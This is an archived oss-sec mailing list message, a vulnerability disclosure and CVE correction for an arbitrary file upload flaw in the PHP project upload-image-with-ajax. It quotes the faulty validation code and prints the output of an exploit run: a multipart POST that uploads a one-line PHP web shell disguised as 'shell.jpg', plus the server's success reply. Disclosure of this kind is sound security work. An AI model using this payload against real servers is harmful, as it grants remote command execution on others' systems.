<!--X-Body-Begin-->
<!--X-User-Header-->
oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->
By Date
By Thread
</form>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
Re: Arbitrary file upload vulnerability in upload-image-with-ajax v1.0
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 23 Dec 2019 16:52:05 -0500
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
Hello,
An update and a correction.
The CVE number should be CVE-2019-8293. The software author also has fixed the vulnerability:
https://github.com/abcprintf/upload-image-with-ajax/commit/71436ba5102010397519d4b25ea57591cfb4974c
Thanks,
Larry
On 12/23/19, 12:09 PM, "Larry W. Cashdollar" <larry0 () me com> wrote:
Title: Arbitrary file upload vulnerability in upload-image-with-ajax
Author: Larry W. Cashdollar
Date: 2019-12-16
CVE-ID:[CVE-2019-8292]
Download Site: https://github.com/abcprintf/upload-image-with-ajax/
Vendor: adcprintf
Vendor Notified: 2019-12-16
Vendor Contact: wh.cprintf () gmail com
Advisory: http://www.vapidlabs.com/advisory.php?v=211
Description: upload-image-with-ajax
Vulnerability:
The code below changes the $ready flag to true if the file conforms to the size of < 1000000. Reversing the check
that the file is an image. So, a .php file can be uploaded with only a warning allowing code execution.
$ready = false;
if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png"))&&in_array($fileExt,
$validext)){
$ready = true;
}else{
echo "was not an image
";
/You should abort the upload right here/
}
if($_FILES["fileUpload"]["size"] < 1000000){
$ready = true;
echo "file size is ".$_FILES['fileUpload']["size"]."
";
}else{
echo "file was TOO BIG!";
}
Exploit Code:
$ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php
POST request size is 469 bytes
Sending Payload:
POST //upload-image-with-ajax/upload.php HTTP/1.1
Host: 192.168.0.3
User-Agent: File Upload Exploiter/v1.2
Accept: */*
Content-Length: 237
Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853
--------------------------c8e05c8871143853
Content-Disposition: form-data; name="fileUpload"; filename="shell.jpg"
Content-Type: image/jpeg
<?php $cmd=$_GET['cmd']; system($cmd);?>
--------------------------c8e05c8871143853--
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2019 04:39:56 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 37
Content-Type: text/html; charset=UTF-8
file size is 42<br>upload successful!
[+] Total bytes read: 185
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
By Date
By Thread
Current thread:
Arbitrary file upload vulnerability in upload-image-with-ajax v1.0 Larry W. Cashdollar (Dec 23)
<Possible follow-ups>
Re: Arbitrary file upload vulnerability in upload-image-with-ajax v1.0 Larry W. Cashdollar (Dec 23)
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->